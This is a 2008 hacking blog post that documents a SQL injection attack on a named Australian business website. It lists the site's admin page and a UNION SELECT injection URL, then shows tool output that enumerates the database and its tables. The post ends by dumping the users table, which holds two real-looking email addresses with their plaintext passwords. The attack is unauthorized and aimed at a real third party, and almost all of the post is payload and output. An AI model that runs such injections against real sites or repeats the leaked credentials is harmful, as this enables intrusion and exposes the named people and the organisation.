viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, November 22, 2008

[SQLi] http://www.westcare.com.au

6:52 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Admin page: http://www.westcare.com.au/admin/

[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:49:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community

[Database]: westcare_cms
[Table: Columns]
[0]code: id,class,description,value,sort_order,status,targetsite,parent_id
[1]main_category: id,description,value,site
[2]main_content: id,ver,author,title,category,description,body,displaydate,active,isdeleteable,iseditable,site
[3]menu: id,link,class,name,target,active,priority,root_id,parent_id,is_deletable,site
[4]news_category: id,description,value,site
[5]news_content: id,author,title,excerp,body,category,createddate,displaydate,expiresdate,updateddate,active,description,isdeleteable,site
[6]users: id,email,password,firstname,lastname,editorinterface,lastloggedin,active

[-] [18:49:44]
[-] Total URL Requests 63
[-] Done


[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:50:25
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community
[+] Dumping data from database "westcare_cms" Table "users"
[+] Column(s) ['email', 'password']
[+] Number of Rows: 2

[0] websupport@tsacorporation.com:ts@c0rp0r@ti0n:
[1] tanya.mcdonald@westcare.com.au:marketing:marketing:

[-] [18:50:26]
[-] Total URL Requests 4
[-] Done

0 comments:

Post a Comment